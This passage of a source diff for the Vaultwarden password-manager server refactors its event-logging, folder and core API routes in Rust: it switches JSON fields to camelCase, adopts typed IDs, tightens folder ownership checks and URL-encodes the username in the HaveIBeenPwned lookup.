parse_date(&data.end)
|
parse_date(&data.end)
|
||||||
};
|
};
|
||||||
|
|
||||||
Event::find_by_org_and_user_org(org_id, user_org_id, &start_date, &end_date, &mut conn)
|
Event::find_by_org_and_member(&org_id, &member_id, &start_date, &end_date, &mut conn)
|
||||||
.await
|
.await
|
||||||
.iter()
|
.iter()
|
||||||
.map(|e| e.to_json())
|
.map(|e| e.to_json())
|
||||||
@@ -119,9 +130,9 @@ async fn get_user_events(
|
|||||||
};
|
};
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Data": events_json,
|
"data": events_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": get_continuation_token(&events_json),
|
"continuationToken": get_continuation_token(&events_json),
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -145,33 +156,33 @@ pub fn main_routes() -> Vec<Route> {
|
|||||||
routes![post_events_collect,]
|
routes![post_events_collect,]
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EventCollection {
|
struct EventCollection {
|
||||||
// Mandatory
|
// Mandatory
|
||||||
Type: i32,
|
r#type: i32,
|
||||||
Date: String,
|
date: String,
|
||||||
|
|
||||||
// Optional
|
// Optional
|
||||||
CipherId: Option<String>,
|
cipher_id: Option<CipherId>,
|
||||||
OrganizationId: Option<String>,
|
organization_id: Option<OrganizationId>,
|
||||||
}
|
}
|
||||||
|
|
||||||
// Upstream:
|
// Upstream:
|
||||||
// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Events/Controllers/CollectController.cs
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Events/Controllers/CollectController.cs
|
||||||
// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
|
||||||
#[post("/collect", format = "application/json", data = "<data>")]
|
#[post("/collect", format = "application/json", data = "<data>")]
|
||||||
async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn post_events_collect(data: Json<Vec<EventCollection>>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
if !CONFIG.org_events_enabled() {
|
if !CONFIG.org_events_enabled() {
|
||||||
return Ok(());
|
return Ok(());
|
||||||
}
|
}
|
||||||
|
|
||||||
for event in data.iter().map(|d| &d.data) {
|
for event in data.iter() {
|
||||||
let event_date = parse_date(&event.Date);
|
let event_date = parse_date(&event.date);
|
||||||
match event.Type {
|
match event.r#type {
|
||||||
1000..=1099 => {
|
1000..=1099 => {
|
||||||
_log_user_event(
|
_log_user_event(
|
||||||
event.Type,
|
event.r#type,
|
||||||
&headers.user.uuid,
|
&headers.user.uuid,
|
||||||
headers.device.atype,
|
headers.device.atype,
|
||||||
Some(event_date),
|
Some(event_date),
|
||||||
@@ -181,11 +192,11 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Head
|
|||||||
.await;
|
.await;
|
||||||
}
|
}
|
||||||
1600..=1699 => {
|
1600..=1699 => {
|
||||||
if let Some(org_uuid) = &event.OrganizationId {
|
if let Some(org_id) = &event.organization_id {
|
||||||
_log_event(
|
_log_event(
|
||||||
event.Type,
|
event.r#type,
|
||||||
org_uuid,
|
org_id,
|
||||||
org_uuid,
|
org_id,
|
||||||
&headers.user.uuid,
|
&headers.user.uuid,
|
||||||
headers.device.atype,
|
headers.device.atype,
|
||||||
Some(event_date),
|
Some(event_date),
|
||||||
@@ -196,13 +207,13 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Head
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
_ => {
|
_ => {
|
||||||
if let Some(cipher_uuid) = &event.CipherId {
|
if let Some(cipher_uuid) = &event.cipher_id {
|
||||||
if let Some(cipher) = Cipher::find_by_uuid(cipher_uuid, &mut conn).await {
|
if let Some(cipher) = Cipher::find_by_uuid(cipher_uuid, &mut conn).await {
|
||||||
if let Some(org_uuid) = cipher.organization_uuid {
|
if let Some(org_id) = cipher.organization_uuid {
|
||||||
_log_event(
|
_log_event(
|
||||||
event.Type,
|
event.r#type,
|
||||||
cipher_uuid,
|
cipher_uuid,
|
||||||
&org_uuid,
|
&org_id,
|
||||||
&headers.user.uuid,
|
&headers.user.uuid,
|
||||||
headers.device.atype,
|
headers.device.atype,
|
||||||
Some(event_date),
|
Some(event_date),
|
||||||
@@ -219,38 +230,39 @@ async fn post_events_collect(data: JsonUpcaseVec<EventCollection>, headers: Head
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn log_user_event(event_type: i32, user_uuid: &str, device_type: i32, ip: &IpAddr, conn: &mut DbConn) {
|
pub async fn log_user_event(event_type: i32, user_id: &UserId, device_type: i32, ip: &IpAddr, conn: &mut DbConn) {
|
||||||
if !CONFIG.org_events_enabled() {
|
if !CONFIG.org_events_enabled() {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
_log_user_event(event_type, user_uuid, device_type, None, ip, conn).await;
|
_log_user_event(event_type, user_id, device_type, None, ip, conn).await;
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn _log_user_event(
|
async fn _log_user_event(
|
||||||
event_type: i32,
|
event_type: i32,
|
||||||
user_uuid: &str,
|
user_id: &UserId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
event_date: Option<NaiveDateTime>,
|
event_date: Option<NaiveDateTime>,
|
||||||
ip: &IpAddr,
|
ip: &IpAddr,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) {
|
) {
|
||||||
let orgs = UserOrganization::get_org_uuid_by_user(user_uuid, conn).await;
|
let memberships = Membership::find_by_user(user_id, conn).await;
|
||||||
let mut events: Vec<Event> = Vec::with_capacity(orgs.len() + 1); // We need an event per org and one without an org
|
let mut events: Vec<Event> = Vec::with_capacity(memberships.len() + 1); // We need an event per org and one without an org
|
||||||
|
|
||||||
// Upstream saves the event also without any org_uuid.
|
// Upstream saves the event also without any org_id.
|
||||||
let mut event = Event::new(event_type, event_date);
|
let mut event = Event::new(event_type, event_date);
|
||||||
event.user_uuid = Some(String::from(user_uuid));
|
event.user_uuid = Some(user_id.clone());
|
||||||
event.act_user_uuid = Some(String::from(user_uuid));
|
event.act_user_uuid = Some(user_id.clone());
|
||||||
event.device_type = Some(device_type);
|
event.device_type = Some(device_type);
|
||||||
event.ip_address = Some(ip.to_string());
|
event.ip_address = Some(ip.to_string());
|
||||||
events.push(event);
|
events.push(event);
|
||||||
|
|
||||||
// For each org a user is a member of store these events per org
|
// For each org a user is a member of store these events per org
|
||||||
for org_uuid in orgs {
|
for membership in memberships {
|
||||||
let mut event = Event::new(event_type, event_date);
|
let mut event = Event::new(event_type, event_date);
|
||||||
event.user_uuid = Some(String::from(user_uuid));
|
event.user_uuid = Some(user_id.clone());
|
||||||
event.org_uuid = Some(org_uuid);
|
event.org_uuid = Some(membership.org_uuid);
|
||||||
event.act_user_uuid = Some(String::from(user_uuid));
|
event.org_user_uuid = Some(membership.uuid);
|
||||||
|
event.act_user_uuid = Some(user_id.clone());
|
||||||
event.device_type = Some(device_type);
|
event.device_type = Some(device_type);
|
||||||
event.ip_address = Some(ip.to_string());
|
event.ip_address = Some(ip.to_string());
|
||||||
events.push(event);
|
events.push(event);
|
||||||
@@ -262,8 +274,8 @@ async fn _log_user_event(
|
|||||||
pub async fn log_event(
|
pub async fn log_event(
|
||||||
event_type: i32,
|
event_type: i32,
|
||||||
source_uuid: &str,
|
source_uuid: &str,
|
||||||
org_uuid: &str,
|
org_id: &OrganizationId,
|
||||||
act_user_uuid: &str,
|
act_user_id: &UserId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
ip: &IpAddr,
|
ip: &IpAddr,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
@@ -271,15 +283,15 @@ pub async fn log_event(
|
|||||||
if !CONFIG.org_events_enabled() {
|
if !CONFIG.org_events_enabled() {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
_log_event(event_type, source_uuid, org_uuid, act_user_uuid, device_type, None, ip, conn).await;
|
_log_event(event_type, source_uuid, org_id, act_user_id, device_type, None, ip, conn).await;
|
||||||
}
|
}
|
||||||
|
|
||||||
#[allow(clippy::too_many_arguments)]
|
#[allow(clippy::too_many_arguments)]
|
||||||
async fn _log_event(
|
async fn _log_event(
|
||||||
event_type: i32,
|
event_type: i32,
|
||||||
source_uuid: &str,
|
source_uuid: &str,
|
||||||
org_uuid: &str,
|
org_id: &OrganizationId,
|
||||||
act_user_uuid: &str,
|
act_user_id: &UserId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
event_date: Option<NaiveDateTime>,
|
event_date: Option<NaiveDateTime>,
|
||||||
ip: &IpAddr,
|
ip: &IpAddr,
|
||||||
@@ -289,33 +301,33 @@ async fn _log_event(
|
|||||||
let mut event = Event::new(event_type, event_date);
|
let mut event = Event::new(event_type, event_date);
|
||||||
match event_type {
|
match event_type {
|
||||||
// 1000..=1099 Are user events, they need to be logged via log_user_event()
|
// 1000..=1099 Are user events, they need to be logged via log_user_event()
|
||||||
// Collection Events
|
// Cipher Events
|
||||||
1100..=1199 => {
|
1100..=1199 => {
|
||||||
event.cipher_uuid = Some(String::from(source_uuid));
|
event.cipher_uuid = Some(source_uuid.to_string().into());
|
||||||
}
|
}
|
||||||
// Collection Events
|
// Collection Events
|
||||||
1300..=1399 => {
|
1300..=1399 => {
|
||||||
event.collection_uuid = Some(String::from(source_uuid));
|
event.collection_uuid = Some(source_uuid.to_string().into());
|
||||||
}
|
}
|
||||||
// Group Events
|
// Group Events
|
||||||
1400..=1499 => {
|
1400..=1499 => {
|
||||||
event.group_uuid = Some(String::from(source_uuid));
|
event.group_uuid = Some(source_uuid.to_string().into());
|
||||||
}
|
}
|
||||||
// Org User Events
|
// Org User Events
|
||||||
1500..=1599 => {
|
1500..=1599 => {
|
||||||
event.org_user_uuid = Some(String::from(source_uuid));
|
event.org_user_uuid = Some(source_uuid.to_string().into());
|
||||||
}
|
}
|
||||||
// 1600..=1699 Are organizational events, and they do not need the source_uuid
|
// 1600..=1699 Are organizational events, and they do not need the source_uuid
|
||||||
// Policy Events
|
// Policy Events
|
||||||
1700..=1799 => {
|
1700..=1799 => {
|
||||||
event.policy_uuid = Some(String::from(source_uuid));
|
event.policy_uuid = Some(source_uuid.to_string().into());
|
||||||
}
|
}
|
||||||
// Ignore others
|
// Ignore others
|
||||||
_ => {}
|
_ => {}
|
||||||
}
|
}
|
||||||
|
|
||||||
event.org_uuid = Some(String::from(org_uuid));
|
event.org_uuid = Some(org_id.clone());
|
||||||
event.act_user_uuid = Some(String::from(act_user_uuid));
|
event.act_user_uuid = Some(act_user_id.clone());
|
||||||
event.device_type = Some(device_type);
|
event.device_type = Some(device_type);
|
||||||
event.ip_address = Some(ip.to_string());
|
event.ip_address = Some(ip.to_string());
|
||||||
event.save(conn).await.unwrap_or(());
|
event.save(conn).await.unwrap_or(());
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ use rocket::serde::json::Json;
|
|||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{EmptyResult, JsonResult, JsonUpcase, Notify, UpdateType},
|
api::{EmptyResult, JsonResult, Notify, UpdateType},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
db::{models::*, DbConn},
|
db::{models::*, DbConn},
|
||||||
};
|
};
|
||||||
@@ -17,101 +17,86 @@ async fn get_folders(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
|||||||
let folders_json: Vec<Value> = folders.iter().map(Folder::to_json).collect();
|
let folders_json: Vec<Value> = folders.iter().map(Folder::to_json).collect();
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"Data": folders_json,
|
"data": folders_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null,
|
"continuationToken": null,
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/folders/<uuid>")]
|
#[get("/folders/<folder_id>")]
|
||||||
async fn get_folder(uuid: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_folder(folder_id: FolderId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let folder = match Folder::find_by_uuid(uuid, &mut conn).await {
|
match Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await {
|
||||||
Some(folder) => folder,
|
Some(folder) => Ok(Json(folder.to_json())),
|
||||||
_ => err!("Invalid folder"),
|
_ => err!("Invalid folder", "Folder does not exist or belongs to another user"),
|
||||||
};
|
|
||||||
|
|
||||||
if folder.user_uuid != headers.user.uuid {
|
|
||||||
err!("Folder belongs to another user")
|
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(Json(folder.to_json()))
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct FolderData {
|
pub struct FolderData {
|
||||||
pub Name: String,
|
pub name: String,
|
||||||
|
pub id: Option<FolderId>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/folders", data = "<data>")]
|
#[post("/folders", data = "<data>")]
|
||||||
async fn post_folders(data: JsonUpcase<FolderData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
async fn post_folders(data: Json<FolderData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
let data: FolderData = data.into_inner().data;
|
let data: FolderData = data.into_inner();
|
||||||
|
|
||||||
let mut folder = Folder::new(headers.user.uuid, data.Name);
|
let mut folder = Folder::new(headers.user.uuid, data.name);
|
||||||
|
|
||||||
folder.save(&mut conn).await?;
|
folder.save(&mut conn).await?;
|
||||||
nt.send_folder_update(UpdateType::SyncFolderCreate, &folder, &headers.device.uuid, &mut conn).await;
|
nt.send_folder_update(UpdateType::SyncFolderCreate, &folder, &headers.device, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(folder.to_json()))
|
Ok(Json(folder.to_json()))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/folders/<uuid>", data = "<data>")]
|
#[post("/folders/<folder_id>", data = "<data>")]
|
||||||
async fn post_folder(
|
async fn post_folder(
|
||||||
uuid: &str,
|
folder_id: FolderId,
|
||||||
data: JsonUpcase<FolderData>,
|
data: Json<FolderData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
conn: DbConn,
|
conn: DbConn,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
put_folder(uuid, data, headers, conn, nt).await
|
put_folder(folder_id, data, headers, conn, nt).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/folders/<uuid>", data = "<data>")]
|
#[put("/folders/<folder_id>", data = "<data>")]
|
||||||
async fn put_folder(
|
async fn put_folder(
|
||||||
uuid: &str,
|
folder_id: FolderId,
|
||||||
data: JsonUpcase<FolderData>,
|
data: Json<FolderData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
let data: FolderData = data.into_inner().data;
|
let data: FolderData = data.into_inner();
|
||||||
|
|
||||||
let mut folder = match Folder::find_by_uuid(uuid, &mut conn).await {
|
let Some(mut folder) = Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(folder) => folder,
|
err!("Invalid folder", "Folder does not exist or belongs to another user")
|
||||||
_ => err!("Invalid folder"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if folder.user_uuid != headers.user.uuid {
|
folder.name = data.name;
|
||||||
err!("Folder belongs to another user")
|
|
||||||
}
|
|
||||||
|
|
||||||
folder.name = data.Name;
|
|
||||||
|
|
||||||
folder.save(&mut conn).await?;
|
folder.save(&mut conn).await?;
|
||||||
nt.send_folder_update(UpdateType::SyncFolderUpdate, &folder, &headers.device.uuid, &mut conn).await;
|
nt.send_folder_update(UpdateType::SyncFolderUpdate, &folder, &headers.device, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(folder.to_json()))
|
Ok(Json(folder.to_json()))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/folders/<uuid>/delete")]
|
#[post("/folders/<folder_id>/delete")]
|
||||||
async fn delete_folder_post(uuid: &str, headers: Headers, conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn delete_folder_post(folder_id: FolderId, headers: Headers, conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
delete_folder(uuid, headers, conn, nt).await
|
delete_folder(folder_id, headers, conn, nt).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[delete("/folders/<uuid>")]
|
#[delete("/folders/<folder_id>")]
|
||||||
async fn delete_folder(uuid: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn delete_folder(folder_id: FolderId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
let folder = match Folder::find_by_uuid(uuid, &mut conn).await {
|
let Some(folder) = Folder::find_by_uuid_and_user(&folder_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(folder) => folder,
|
err!("Invalid folder", "Folder does not exist or belongs to another user")
|
||||||
_ => err!("Invalid folder"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if folder.user_uuid != headers.user.uuid {
|
|
||||||
err!("Folder belongs to another user")
|
|
||||||
}
|
|
||||||
|
|
||||||
// Delete the actual folder entry
|
// Delete the actual folder entry
|
||||||
folder.delete(&mut conn).await?;
|
folder.delete(&mut conn).await?;
|
||||||
|
|
||||||
nt.send_folder_update(UpdateType::SyncFolderDelete, &folder, &headers.device.uuid, &mut conn).await;
|
nt.send_folder_update(UpdateType::SyncFolderDelete, &folder, &headers.device, &mut conn).await;
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -12,12 +12,13 @@ pub use accounts::purge_auth_requests;
|
|||||||
pub use ciphers::{purge_trashed_ciphers, CipherData, CipherSyncData, CipherSyncType};
|
pub use ciphers::{purge_trashed_ciphers, CipherData, CipherSyncData, CipherSyncType};
|
||||||
pub use emergency_access::{emergency_notification_reminder_job, emergency_request_timeout_job};
|
pub use emergency_access::{emergency_notification_reminder_job, emergency_request_timeout_job};
|
||||||
pub use events::{event_cleanup_job, log_event, log_user_event};
|
pub use events::{event_cleanup_job, log_event, log_user_event};
|
||||||
|
use reqwest::Method;
|
||||||
pub use sends::purge_sends;
|
pub use sends::purge_sends;
|
||||||
|
|
||||||
pub fn routes() -> Vec<Route> {
|
pub fn routes() -> Vec<Route> {
|
||||||
let mut eq_domains_routes = routes![get_eq_domains, post_eq_domains, put_eq_domains];
|
let mut eq_domains_routes = routes![get_eq_domains, post_eq_domains, put_eq_domains];
|
||||||
let mut hibp_routes = routes![hibp_breach];
|
let mut hibp_routes = routes![hibp_breach];
|
||||||
let mut meta_routes = routes![alive, now, version, config];
|
let mut meta_routes = routes![alive, now, version, config, get_api_webauthn];
|
||||||
|
|
||||||
let mut routes = Vec::new();
|
let mut routes = Vec::new();
|
||||||
routes.append(&mut accounts::routes());
|
routes.append(&mut accounts::routes());
|
||||||
@@ -49,19 +50,20 @@ pub fn events_routes() -> Vec<Route> {
|
|||||||
use rocket::{serde::json::Json, serde::json::Value, Catcher, Route};
|
use rocket::{serde::json::Json, serde::json::Value, Catcher, Route};
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{JsonResult, JsonUpcase, Notify, UpdateType},
|
api::{JsonResult, Notify, UpdateType},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
db::DbConn,
|
db::DbConn,
|
||||||
error::Error,
|
error::Error,
|
||||||
util::{get_reqwest_client, parse_experimental_client_feature_flags},
|
http_client::make_http_request,
|
||||||
|
util::parse_experimental_client_feature_flags,
|
||||||
};
|
};
|
||||||
|
|
||||||
#[derive(Serialize, Deserialize, Debug)]
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct GlobalDomain {
|
struct GlobalDomain {
|
||||||
Type: i32,
|
r#type: i32,
|
||||||
Domains: Vec<String>,
|
domains: Vec<String>,
|
||||||
Excluded: bool,
|
excluded: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
const GLOBAL_DOMAINS: &str = include_str!("../../static/global_domains.json");
|
const GLOBAL_DOMAINS: &str = include_str!("../../static/global_domains.json");
|
||||||
@@ -81,38 +83,38 @@ fn _get_eq_domains(headers: Headers, no_excluded: bool) -> Json<Value> {
|
|||||||
let mut globals: Vec<GlobalDomain> = from_str(GLOBAL_DOMAINS).unwrap();
|
let mut globals: Vec<GlobalDomain> = from_str(GLOBAL_DOMAINS).unwrap();
|
||||||
|
|
||||||
for global in &mut globals {
|
for global in &mut globals {
|
||||||
global.Excluded = excluded_globals.contains(&global.Type);
|
global.excluded = excluded_globals.contains(&global.r#type);
|
||||||
}
|
}
|
||||||
|
|
||||||
if no_excluded {
|
if no_excluded {
|
||||||
globals.retain(|g| !g.Excluded);
|
globals.retain(|g| !g.excluded);
|
||||||
}
|
}
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"EquivalentDomains": equivalent_domains,
|
"equivalentDomains": equivalent_domains,
|
||||||
"GlobalEquivalentDomains": globals,
|
"globalEquivalentDomains": globals,
|
||||||
"Object": "domains",
|
"object": "domains",
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EquivDomainData {
|
struct EquivDomainData {
|
||||||
ExcludedGlobalEquivalentDomains: Option<Vec<i32>>,
|
excluded_global_equivalent_domains: Option<Vec<i32>>,
|
||||||
EquivalentDomains: Option<Vec<Vec<String>>>,
|
equivalent_domains: Option<Vec<Vec<String>>>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/settings/domains", data = "<data>")]
|
#[post("/settings/domains", data = "<data>")]
|
||||||
async fn post_eq_domains(
|
async fn post_eq_domains(
|
||||||
data: JsonUpcase<EquivDomainData>,
|
data: Json<EquivDomainData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
nt: Notify<'_>,
|
nt: Notify<'_>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
let data: EquivDomainData = data.into_inner().data;
|
let data: EquivDomainData = data.into_inner();
|
||||||
|
|
||||||
let excluded_globals = data.ExcludedGlobalEquivalentDomains.unwrap_or_default();
|
let excluded_globals = data.excluded_global_equivalent_domains.unwrap_or_default();
|
||||||
let equivalent_domains = data.EquivalentDomains.unwrap_or_default();
|
let equivalent_domains = data.equivalent_domains.unwrap_or_default();
|
||||||
|
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
use serde_json::to_string;
|
use serde_json::to_string;
|
||||||
@@ -122,31 +124,25 @@ async fn post_eq_domains(
|
|||||||
|
|
||||||
user.save(&mut conn).await?;
|
user.save(&mut conn).await?;
|
||||||
|
|
||||||
nt.send_user_update(UpdateType::SyncSettings, &user).await;
|
nt.send_user_update(UpdateType::SyncSettings, &user, &headers.device.push_uuid, &mut conn).await;
|
||||||
|
|
||||||
Ok(Json(json!({})))
|
Ok(Json(json!({})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/settings/domains", data = "<data>")]
|
#[put("/settings/domains", data = "<data>")]
|
||||||
async fn put_eq_domains(
|
async fn put_eq_domains(data: Json<EquivDomainData>, headers: Headers, conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
data: JsonUpcase<EquivDomainData>,
|
|
||||||
headers: Headers,
|
|
||||||
conn: DbConn,
|
|
||||||
nt: Notify<'_>,
|
|
||||||
) -> JsonResult {
|
|
||||||
post_eq_domains(data, headers, conn, nt).await
|
post_eq_domains(data, headers, conn, nt).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/hibp/breach?<username>")]
|
#[get("/hibp/breach?<username>")]
|
||||||
async fn hibp_breach(username: &str) -> JsonResult {
|
async fn hibp_breach(username: &str, _headers: Headers) -> JsonResult {
|
||||||
let url = format!(
|
let username: String = url::form_urlencoded::byte_serialize(username.as_bytes()).collect();
|
||||||
"https://haveibeenpwned.com/api/v3/breachedaccount/{username}?truncateResponse=false&includeUnverified=false"
|
|
||||||
);
|
|
||||||
|
|
||||||
if let Some(api_key) = crate::CONFIG.hibp_api_key() {
|
if let Some(api_key) = crate::CONFIG.hibp_api_key() {
|
||||||
let hibp_client = get_reqwest_client();
|
let url = format!(
|
||||||
|
"https://haveibeenpwned.com/api/v3/breachedaccount/{username}?truncateResponse=false&includeUnverified=false"
|
||||||
|
);
|
||||||
|
|
||||||
let res = hibp_client.get(&url).header("hibp-api-key", api_key).send().await?;
|
let res = make_http_request(Method::GET, &url)?.header("hibp-api-key", api_key).send().await?;
|
||||||
|
|
||||||
// If we get a 404, return a 404, it means no breached accounts
|
// If we get a 404, return a 404, it means no breached accounts
|
||||||
if res.status() == 404 {
|
if res.status() == 404 {
|
||||||
@@ -157,15 +153,15 @@ async fn hibp_breach(username: &str) -> JsonResult {
|
|||||||
Ok(Json(value))
|
Ok(Json(value))
|
||||||
} else {
|
} else {
|
||||||
Ok(Json(json!([{
|
Ok(Json(json!([{
|
||||||
"Name": "HaveIBeenPwned",
|
"name": "HaveIBeenPwned",
|
||||||
"Title": "Manual HIBP Check",
|
"title": "Manual HIBP Check",
|
||||||
"Domain": "haveibeenpwned.com",
|
"domain": "haveibeenpwned.com",
|
||||||
"BreachDate": "2019-08-18T00:00:00Z",
|
"breachDate": "2019-08-18T00:00:00Z",
|
||||||
"AddedDate": "2019-08-18T00:00:00Z",
|
"addedDate": "2019-08-18T00:00:00Z",
|
||||||
"Description": format!("Go to: <a href=\"https://haveibeenpwned.com/account/{username}\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/account/{username}</a> for a manual check.<br/><br/>HaveIBeenPwned API key not set!<br/>Go to <a href=\"https://haveibeenpwned.com/API/Key\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/API/Key</a> to purchase an API key from HaveIBeenPwned.<br/><br/>"),
|
"description": format!("Go to: <a href=\"https://haveibeenpwned.com/account/{username}\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/account/{username}</a> for a manual check.<br/><br/>HaveIBeenPwned API key not set!<br/>Go to <a href=\"https://haveibeenpwned.com/API/Key\" target=\"_blank\" rel=\"noreferrer\">https://haveibeenpwned.com/API/Key</a> to purchase an API key from HaveIBeenPwned.<br/><br/>"),
|
||||||
"LogoPath": "vw_static/hibp.png",
|
"logoPath": "vw_static/hibp.png",
|
||||||
"PwnCount": 0,
|
"pwnCount": 0,
|
||||||
"DataClasses": [
|
"dataClasses": [
|
||||||
"Error - No API key set!"
|
"Error - No API key set!"
|
||||||
]
|
]
|
||||||
}])))
|
}])))
|
||||||
@@ -188,22 +184,48 @@ fn version() -> Json<&'static str> {
|
|||||||
Json(crate::VERSION.unwrap_or_default())
|
Json(crate::VERSION.unwrap_or_default())
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[get("/webauthn")]
|
||||||
|
fn get_api_webauthn(_headers: Headers) -> Json<Value> {
|
||||||
|
// Prevent a 404 error, which also causes key-rotation issues
|
||||||
|
// It looks like this is used when login with passkeys is enabled, which Vaultwarden does not (yet) support
|
||||||
|
// An empty list/data also works fine
|
||||||
|
Json(json!({
|
||||||
|
"object": "list",
|
||||||
|
"data": [],
|
||||||
|
"continuationToken": null
|
||||||
|
}))
|
||||||
|
}
|
||||||
|
|
||||||
#[get("/config")]
|
#[get("/config")]
|
||||||
fn config() -> Json<Value> {
|
fn config() -> Json<Value> {
|
||||||
let domain = crate::CONFIG.domain();
|
let domain = crate::CONFIG.domain();
|
||||||
let feature_states = parse_experimental_client_feature_flags(&crate::CONFIG.experimental_client_feature_flags());
|
// Official available feature flags can be found here:
|
||||||
|
// Server (v2025.6.2): https://github.com/bitwarden/server/blob/d094be3267f2030bd0dc62106bc6871cf82682f5/src/Core/Constants.cs#L103
|
||||||
|
// Client (web-v2025.6.1): https://github.com/bitwarden/clients/blob/747c2fd6a1c348a57a76e4a7de8128466ffd3c01/libs/common/src/enums/feature-flag.enum.ts#L12
|
||||||
|
// Android (v2025.6.0): https://github.com/bitwarden/android/blob/b5b022caaad33390c31b3021b2c1205925b0e1a2/app/src/main/kotlin/com/x8bit/bitwarden/data/platform/manager/model/FlagKey.kt#L22
|
||||||
|
// iOS (v2025.6.0): https://github.com/bitwarden/ios/blob/ff06d9c6cc8da89f78f37f376495800201d7261a/BitwardenShared/Core/Platform/Models/Enum/FeatureFlag.swift#L7
|
||||||
|
let mut feature_states =
|
||||||
|
